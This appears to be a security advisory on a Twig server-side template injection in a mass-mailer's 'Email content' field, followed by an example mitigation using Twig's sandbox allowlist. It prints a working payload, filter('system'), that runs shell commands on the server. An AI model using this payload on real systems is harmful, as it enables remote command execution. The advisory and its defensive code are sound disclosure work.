An admin or a staff user with the “Mass mailer” permission can perform a Server-Side Template Injection attack
Log in as an admin or as a staff user who has the “Mass mailer” permission, then edit a message.
In the “Email content” field, insert the following value and click “Update and preview”:
{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}
Order our services at {{ "order"|link }}
{{ guest.system_company.name }}
{% endapply %}
Observe that the command “id” is executed on the server when the message is previewed.
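The payload works because Twig's built-in filter filter accepts a callable by name, so the string system is handed straight to PHP's system(). The application-side mitigation is to render the staff-editable template inside Twig's sandbox with an allowlist that simply omits filter, map and reduce, so a template containing that payload is rejected before anything runs. The following is an added example, not the project's code; the template content, the allowlist and the variable names are assumptions.

```php
<?php
// Added example (not the project's code): render a staff-supplied
// "Email content" template under Twig's sandbox so that filters which
// take arbitrary callables ("filter", "map", "reduce") are unavailable.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SecurityError;

// Constructed sample of a malicious "Email content" value.
$emailContent = <<<'TWIG'
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}
TWIG;

// Allowlist only what a mail template legitimately needs. The key point
// is what is absent: no "filter"/"map"/"reduce", no methods, no functions.
$policy = new SecurityPolicy(
    ['if', 'for', 'apply'],   // allowed tags
    ['escape', 'upper'],      // allowed filters
    [],                       // allowed methods (none)
    [],                       // allowed properties (none)
    []                        // allowed functions (none)
);

$twig = new Environment(
    new ArrayLoader(['mail' => $emailContent]),
    ['autoescape' => 'html']
);
// Second argument = true: every template is sandboxed, not just those
// wrapped in {% sandbox %}.
$twig->addExtension(new SandboxExtension($policy, true));

try {
    echo $twig->render('mail', ['c' => ['email' => 'staff@example.invalid']]);
} catch (SecurityError $e) {
    // Rejected at compile/runtime by the policy; nothing was executed.
    error_log('Rejected mass-mailer template: ' . $e->getMessage());
    http_response_code(400);
}
```

With the policy above the render throws a SecurityNotAllowedFilterError for filter and the preview is refused; supported Twig releases additionally refuse a non-Closure callable for filter, map and reduce while sandboxed, but relying on the allowlist rather than that check keeps the mailer safe even if those filters are ever re-enabled.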